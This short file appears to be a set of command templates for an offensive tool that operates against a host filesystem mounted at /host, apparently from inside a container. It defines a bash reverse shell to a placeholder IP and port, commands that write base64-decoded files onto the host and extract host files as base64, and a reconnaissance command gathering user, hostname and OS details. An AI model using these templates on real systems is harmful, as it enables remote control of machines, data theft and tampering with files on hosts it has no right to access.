revshell='bash -c "exec bash -i &>/dev/tcp/IP/PORT <&1"'
upload_file="pwd && echo '{{CONTENT}}' | base64 -d > '/host/{{DEST}}' && echo 'file uploaded at:';ls '/host{{DEST}}' || echo 'Upload failed'"
list='id'
#extract_file="echo 'BEGIN-EXTRACT'; cat /host/{{SOURCE}} | base64 -w0; echo 'END-EXTRACT'"
extract_file='printf "BEGIN-EXTRACT\n"; base64 /host/{{SOURCE}}; printf "\nEND-EXTRACT\n"'
run='/bin/sh -c "whoami; hostname; id; uname -a; cat /etc/os-release 2>/dev/null || cat /usr/lib/os-release 2>/dev/null"'
hello='echo "hello"'
